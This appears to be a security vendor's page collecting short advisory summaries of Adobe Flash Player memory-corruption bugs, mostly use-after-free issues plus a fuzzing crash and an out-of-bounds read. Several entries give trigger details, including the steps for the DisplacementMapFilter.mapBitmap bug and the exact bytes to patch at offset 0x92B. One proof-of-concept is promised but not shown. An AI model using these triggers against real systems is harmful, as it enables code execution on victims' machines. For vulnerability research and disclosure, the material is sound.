A nasty looking crash is manifesting in various different ways under fuzzing, apparently related to drawing and bitmap handling. The crash on 64-bit Linux looks like this: rax 0x83071500ff0300 36881008741516032. If we trace through the usages of %rax, we can get to some bad writes pretty easily. A trigger is attached, signal_sigsegv_7ffff5b5aee2_252_0688bbd450e7c095265d00be2fca50ab.swf and the base file from which this fuzz case was generated is also attached, 0688bbd450e7c095265d00be2fca50ab.swf.
There is a use-after-free vulnerability in Adobe Flash Player due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is provided in the form of a sample fla and swf.
There are use-after frees realated to storing a single pointer (this this pointer) in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, linGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving bitmapFill is bewlo: A sample fla and swf are attached.
There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for both MovieClips and Buttons, it needs to be fixed in both classes. A proof-of-concept is provided in the form of a .fla and .swf file.
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. This is almost a repost of Issue 457680 due to a patch failure. The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue. Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available). After compiling mapBitmap_v2_as2.swf, the bytes at offset 0x92B in the (MyBitmapData constructor) must be changed from 52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP).
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
If a watch is set on the childNodes object of an XML object, and then the XML object is manipulated in a way that causes its child nodes to be enumerated, the watch will trigger. If the function in the watch deletes all the child nodes, the buffer containing the nodes will be deleted, even though the original function will still access it when it unwinds. This can lead to a childnodes array in ActionScript containing pointers that can be specified by an attacker.
An access violation was observed in the Adobe Flash Player plugin, which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by a memory corruption issue when handling specially crafted Flash content.
The out-of-bounds read appears to be caused by a missing bounds check in the code, which is reliably reproducible with the latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue. Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344. Here are a few steps to trigger the issue: 1) Create a BitmapData and store it somewhere, for example as a static member of a custom class. 2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter. 3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns. 4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property. 5) Use the first BitmapData and call getPixel32(o).
Services By CQR